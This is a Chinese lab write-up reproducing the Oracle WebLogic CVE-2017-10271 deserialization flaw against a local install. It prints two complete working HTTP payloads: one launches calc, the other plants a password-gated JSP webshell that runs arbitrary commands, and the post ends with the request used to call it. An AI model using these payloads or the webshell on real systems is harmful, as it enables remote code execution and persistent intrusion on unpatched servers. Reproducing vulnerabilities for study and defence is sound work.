之前本来复现过一次的,结果后来数据丢了,只好再来一遍。
没找到在linux下命令行安装的方法,于是直接在windows上安装算了。
12.2.1.2.0下载:
windows环境,需以管理员身份运行,否则会出现:
以管理员身份运行:
最后启动管理服务器:
查看网络端口:
然后exploit之后没有成功。
https://www.exploit-db.com/exploits/43458/
可能是Java8的原因,然而切换Java版本比较困难。
最终终于找到修改Java Home的地方了,在user_projects\domains\base_domain\bin\setDomainEnv.cmd
然而运行weblogic的时候提示说不支持Java8以下的。
然后我把请求方到burp里看了一下,修改成windows的payload,然后依然发现是404 Not Found。难道官方已经把这个版本中的受影响的组件删除了?
10.3.6.0下载:
https://download.oracle.com/otn/nt/middleware/11g/wls/1036/wls1036_generic.jar
安装的时候大概是这样:
这次终于可以访问了/wls-wsat/CoordinatorPortType
:
PoC:
https://www.exploit-db.com/exploits/43458/
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Content-Length: 539
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1" >
<void index="0">
<string>calc</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
弹计算器:
写入webshell(https://github.com/iBearcat/Oracle-WebLogic-CVE-2017-10271):
请求:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Content-Length: 920
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println"><string><![CDATA[<% if("cqq".equals(request.getParameter("password"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("command")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
} %>]]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>
然后可以通过http请求:
http://127.0.0.1:7001/bea_wls_internal/test.jsp?password=cqq&command=tasklist